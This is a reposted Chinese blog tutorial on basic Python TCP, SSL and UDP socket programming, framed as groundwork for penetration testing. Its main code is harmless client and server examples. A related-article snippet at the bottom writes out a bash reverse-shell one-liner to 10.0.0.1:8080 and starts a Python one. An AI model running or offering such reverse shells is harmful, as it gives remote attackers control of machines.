python 渗透测试基础-网络通讯

最新推荐文章于 2021-07-29 19:05:05 发布
最新推荐文章于 2021-07-29 19:05:05 发布
阅读量1.2k 收藏
点赞数
分类专栏: python番外篇 文章标签: 网络 socket http python zookeeper
原文链接:https://www.lzfkj.vip/post/20
版权

本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20

文章目录

python 渗透测试基础-网络通讯

简述

    在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式,还有一个比较常用的方式是逻辑断开,即在路由器或智能交换机使用配置断开目标网络的连接,那么这个时候,我们就需要自己来提供网络交互手段。常用的网络交互一般都是服务端和客户端,常用的协议有http,https,再底层一点就是TCP和UDP。对于需要快速实现的场景来说,底层的TCP和UDP(网络层)比高层(应用层)的http更方便实现。

下面我们就来看看TCP和UDP的两个实例。

TCP实例

在python中,有提供了socket方式来实现TCP,使用的时候可直接导入使用,不需要二次安装。

import socket

TCP 服务端

首先,我们来看看TCP的服务端的实现。

def tcp_server():
    bind_ip = '0.0.0.0'
    bind_port = 1997
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((bind_ip, bind_port))
    server.listen(5)
    print(f'Listing on {bind_ip}:{bind_port}')

    while True:
        client, addr = server.accept()
        print(f'[*]Accepted connect from {addr[0]},{addr[1]}')
        client_handler = threading.Thread(target=_server_handle_client, args=(client,))
        client_handler.start()

代码说明

  • 在“0.0.0.0“的1997端口上进行监听
  • 可以接受5个客户端实例
  • 只要有客户端实例接入后,就开启一个线程去处理
  • 线程中的处理函数是_server_handle_client

处理函数_server_handle_client的实现

def _server_handle_client(client_socket):
    """
    客户端处理
    :param client_socket:
    :return:
    """
    request = client_socket.recv(1024)
    print(f'[*] Received:{request}')
    client_socket.send('ACK!'.encode())
    client_socket.close()

处理函数中,实现很简单,收到消息打印,然后返回“ACK!”

以上,TCP的服务端已完成。

TCP 客户端

从以上【TCP服务端】的实现可知,我们只要连接其绑定的IP和端口即可进行数据交互。下面我们来看看客户端的实现。

def tcp_client():
    """
    关于 tcp 的一个客户端
    :return:
    """
    target_host = '192.168.1.103'
    target_port = 1997
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    address = (target_host, target_port)
    client.connect(address)
    pay = 'GET / HTTP/1.1\r\nHost:192.168.1.103/\r\n\r\n'
    client.send(pay.encode())
    response = client.recv(4096)
    print(response.decode())

运行结果

运行服务端

(csdn) michaelkoo@MacBook ai_auto % python handle_socket.py 
Listing on 0.0.0.0:1997

[*]Accepted connect from 192.168.1.103,49261
[*] Received:b'GET / HTTP/1.1\r\nHost:192.168.1.103/\r\n\r\n'

其中“[*]”开头的部分是客户端连接之后才打印出来的。

运行客户端

/Users/michaelkoo/work/env/csdn/code/ImgBianhua/venv/bin/python /Users/michaelkoo/work/env/csdn/code/ImgBianhua/main.py
ACK!

客户端这边也收到了服务端的响应。

TCP的另外一个客户端

除了上面实现的本地连接客户端和服务端,那么我们能不能连接非本地或者说要连接外部网络的服务端呢?答案是可以的,现在我们来连接下外部网络服务。

在这里,我们以上面的客户端为基础进行小小的调整。代码如下。

def tcp_client_2():
    """
    关于 tcp 的另外一个客户端
    :return:
    """
    target_host = 'www.lzfkj.vip'
    target_port = 80
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    address = (target_host, target_port)
    client.connect(address)
    pay = 'GET / HTTP/1.1\r\nHost:lzfkj.vip\r\n\r\n'
    client.send(pay.encode())
    response = client.recv(4096)
    print(response.decode())

运行之后,我们看看结果。

HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Mon, 01 Mar 2021 14:35:07 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://www.lzfkj.vip/

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.16.1</center>
</body>
</html>

这里返回了301,状态码为301表示,这个地址的内容被永久转移到Location去了,也就是说“http://www.lzfkj.vip” 被永久的转移到了"https://www.lzfkj.vip"。

这是出错了吗?

没有,这是www.lzfkj.vip配置了80端口的请求被转发到了443端口上去处理了。

那么,我们是怎么来发起https的请求呢?

TCP的SSL请求客户端

在python中,我们发起SSL请求,可以使用ssl库,比如我们可以这样使用。

import ssl

那么我们该如何发起一个请求呢?我们可以这样做。

def tcp_client_ssl():
    """
    发起SSL请求的TCP客户端
    :return:
    """
    target = 'www.lzfkj.vip'
    port = 443
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ssl_sock = ssl.wrap_socket(sock)
    ssl_sock.connect((target, port))
    ssl_sock.send('GET / HTTP/1.1\r\nHost:lzfkj.vip\r\n\r\n'.encode())
    resp = ssl_sock.recv(1024)
    print(resp.decode())

返回结果:

/Users/michaelkoo/work/env/csdn/code/ImgBianhua/venv/bin/python /Users/michaelkoo/work/env/csdn/code/ImgBianhua/main.py
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 01 Mar 2021 14:54:12 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: JSESSIONID=lwq6tYCGIKmYADPD26b6ucgHRO96WD5ssYWWG4tG; path=/
Content-Language: zh-CN

1f2c

<!DOCTYPE html>
<html lang="zh-CN">
<head>
     
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!--[if IE]>
    <meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'/>
    <![endif]-->
    <meta name="keywords" content="python,python基础教程,python爬虫">
    <meta name="description" content="python教程, 做一个有内涵的技术社区,python基础教程,python爬虫,人工智能,python django,python flask,">
    <meta name="robots" content="index,follow" />
     <!-- sougou-->
    <meta name="sogou_site_verification" content="aFOkC"/>
    <!-- baidu-->
    <meta name="baidu-site-verification" content="codoHdwUv" />
    <!-- 360-->
    <meta name="360-si

Process finished with exit code 0

从结果中,我们可以看到,已经请求成功了。

以上,就是TCP的相关实例。

UDP实例

UDP 服务端

def udp_server():
    """
    关于udp的一个服务端
    :return:
    """
    bind_ip = '0.0.0.0'
    bind_port = 1999
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind((bind_ip, bind_port))
    print(f'Listing on {bind_ip}:{bind_port}')

    while True:
        data = server.recvfrom(1024)
        print(f'resp:{data}')
        server.sendto(data[0], data[1])

UDP 客户端

def udp_client():
    """
    关于udp的一个客户端
    :return:
    """
    target_host = '192.168.1.103'
    target_port = 1999
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    address = (target_host, target_port)
    client.sendto('www.lzfkj.vip'.encode(), address)
    data, addr = client.recvfrom(1024)
    print(data, addr)

运行结果:

服务端


resp:(b'www.lzfkj.vip', ('127.0.0.1', 51010))

客户端

(csdn) michaelkoo@MacBook code % python udp_client.py
b'www.lzfkj.vip' ('127.0.0.1', 1999)
慕容卡卡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python端口通信_Python实现TCP/IP协议下的端口转发及重定向示例
weixin_34549315的博客
02-04 1146
首先,我们用webpy写一个简单的网站,监听8080端口,返回“Hello, EverET.org”的页面。然后我们使用我们的forwarding.py,在80端口和8080端口中间建立两条通信管道用于双向通信。此时,我们通过80端口访问我们的服务器。浏览器得到:然后,我们在forwarding.py的输出结果中可以看到浏览器和webpy之间的通信内容。代码:#!/usr/bin/env pyth...
Python程序设计——安全渗透测试的常见模块
bluepangzi的博客
03-29 970
安全渗透测试的常见模块一、Socket 模块1.实例化 Socket 类2.Socket常用的函数—服务端函数bind():listen():accept():3.客户端的函数send():sendall():recv():sendto():recvfrom():4.使用Socket编写一个简单的服务端和客户端二、python-nmap模块1.python-nmap安装过程2.python-nmap模块类的实例化PortScanner类3.python-nmap模块中的函数scan()函数:参数hosts参
渗透中反弹shell与端口
千寻的博客
01-03 1812
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
python网络渗透入门_利用Python进行Web渗透测试(四):HTTP协议基础
weixin_39890543的博客
12-10 212
本篇将会涉及:什么是HTTP,以及HTTP的工作方式HTTP的方法一、什么是HTTPHTTP协议HTTP全称超文本传输协议,一个设计用来来客户端和服务器之间进行通信的协议。HTTP在网络世界中属于OSI模型的第七层——应用层,也属于TCP/IP模型的第四层——应用层。关于什么是OSI模型,什么又是TCP/IP模型,简而言之,其是计算机网络世界的一个网络体系结构,用来定义计算机网络及其各个部分通信的...
靶机渗透之Typhoon实战
weixin_52924983的博客
02-08 823
本次的Typhoon靶机包含了几个漏洞和配置错误。你们可以用这个靶机来测试网络服务漏洞,配置错误,web应用漏洞,也可以进行密码破解攻击,提权,后渗透,还可以进行信息收集和DNS攻击。 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 渗透测试方法 · 网络扫描(Netdiscover和Nmap都行) · 方法一:利用MongoDB进行入侵 · 查看robots.txt · 通过浏览器利用MongoDB · 获取凭证 · SSH登录 · 查看内核版本
python渗透测试编程技术-方法与实践.azw3_python渗透测试_
09-30
python渗透测试,使用kindle 看
E084-Python安全渗透测试-TEAR DROP渗透测试.pdf
12-02
E084-Python安全渗透测试-TEAR DROP渗透测试
E082-Python安全渗透测试-TCP SYN FLOOD网络渗透测试.pdf
12-02
【TCP SYN Flood网络渗透测试】是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,利用了TCP协议的三次握手机制。攻击者通过伪造IP地址,向目标服务器大量发送SYN(同步序列编号)请求,但不进行后续的ACK...
E079-Python安全渗透测试-LAND网络渗透测试.pdf
12-02
E079-Python安全渗透测试-LAND网络渗透测试
E080-Python安全渗透测试-SMURF网络渗透测试.pdf
12-02
E080-Python安全渗透测试-SMURF网络渗透测试
Scapy-Pentest:Scapy 渗透测试脚本
06-03
Scapy 渗透测试脚本 手动的: 都应该以 root 身份运行 在终端中:python %script_name%
python渗透测试脚本 学习记录(三)
逸琅的博客
05-15 941
python渗透测试脚本——信息收集之爬取邮箱 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。 本人在学习过程中主要参考书籍为《Python安全攻防——渗透测试指南》 渗透测试的过程主要分为: 明确目标 信息收集 漏洞检测 漏洞验证 信息分析 获取所需信息 清楚痕迹 撰写报告 最近的任务就是使用python完成第二项:信息收集 邮件钓鱼攻击是非常常见的一种攻击手法,在使用这种手法进行攻击
给大家分享一篇 Python渗透测试开源项目【源码值得精读】
qq_41235053的博客
08-07 2919
sql注入工具:sqlmap DNS安全监测:DNSRecon 暴力破解测试工具:patator XSS漏洞利用工具:XSSer Web服务器压力测试工具:HULK SSL安全扫描器:SSLyze 网络 Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a libr...
Python黑帽子--黑客与渗透测试编程之道
热门推荐
giantbranch的专栏
01-30 8万+
为了方便查找,请看目录(手机端就没有目录哦)→→→→→→→→→→→→→→→ 注:本文篇幅较大,请耐心等待(power by 《Python黑帽子:黑客与渗透测试编程之道 》)   欢迎光顾我的新博客:https://www.giantbranch.cn   终于学完了,也敲完代码了,其中有好几个都没成功实践出作者的预期结果,知道我哪里错的,欢迎指点。(有问题的同学可以看看评论,或许有其他...
[渗透测试]python内网渗透信息收集脚本
WHACKW的专栏
06-09 980
渗透测试从互联网找到了入侵内网的入口点之后剩下的就内网渗透测试了。       有人说到了内网还不容易,随便拿个hscan一抓一大把弱口令。我同意这个看法,但是在我看来,内网环境复杂得多,要想精确获取自己想要的目标,要处理的内容要多得多,只有获得了必要的信息,才有的抓的目标,我认为一般内网环境中的渗透测试最难和最重要的是精确的信息收集,剩下的自然可以顺理成章的进行常规的漏洞扫描和利用。如果有
Python渗透测试工具合集
xiaozhanger的专栏
06-29 524
https://www.shiyanlou.com/questions/3972
Python黑帽子:黑客与渗透测试编程之道》 网络基础
weixin_30595035的博客
05-28 139
TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端。访问的URL是百度。 #coding=utf-8 import socket target_host = "www.baidu.com" target_port = 80 #建立一个socket对象 client = soc...
插件分享 | 调用Python脚本进行漏洞测试PythonCall
m0_46699477的博客
07-29 348
前言: 站在红队的角度,Goby 是一款优秀的渗透测试工具,特点十分鲜明。在漏洞扫描上,一是设备规则集丰富,目前已支持超过 10 万种设备和业务系统,二是部署方便,可部署在任意单机,无需进行复杂的配置。在漏洞录入上,Goby 自研的漏洞扫描框架由 Golang 语言编写,目前的漏洞录入有两种形式,一是通过 JSON 格式录入漏洞发包和判断的逻辑,二是使用 Golang 代码编写发包和判断逻辑。在漏洞开发上,如果能够引入 Python 环境支持运行 Python 脚本,不仅可以提高开发效率,支持更多通信协议.
渗透之——Python爆破Wifi密码
冰河的专栏
01-10 3857
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86257581 脚本以图形界面的形式,选择爆破的用户名字典文件和密码字典文件进行Wifi爆破,废话不多说,直接上代码,有问题的再问我。 #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf-8 -*- # ...
Python渗透测试
最新发布
05-28
Python是一种常用的编程语言,因其易学易用且强大的功能而广泛应用于各个领域,包括渗透测试Python渗透测试中具有以下几个优点: 1. 语法简单易学:Python的语法简单易懂,可以快速掌握基本编程概念和技巧。 2. 库丰富:Python拥有大量的库和模块,可以方便地实现各种渗透测试工具和技术,如网络扫描、漏洞利用、密码破解等。 3. 跨平台性强:Python可以在多个操作系统上运行,包括Windows、Linux、MacOS等。 4. 支持多种协议和格式:Python支持多种协议和格式,如HTTP、TCP、UDP、XML、JSON等,可以方便地处理网络数据。 渗透测试是一种通过模拟黑客攻击来测试系统安全性的方法。Python渗透测试中的应用主要包括以下几个方面: 1. 网络扫描:Python可以使用socket库实现端口扫描、服务识别等功能。 2. 漏洞利用:Python可以使用Metasploit框架、ExploitDB等工具进行漏洞利用。 3. 密码破解:Python可以使用hashlib库进行散列算法加密,同时也可以使用Brute-Force和字典攻击等技术进行密码破解。 4. 数据分析:Python可以使用pandas、numpy等库进行数据分析,以辅助渗透测试工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值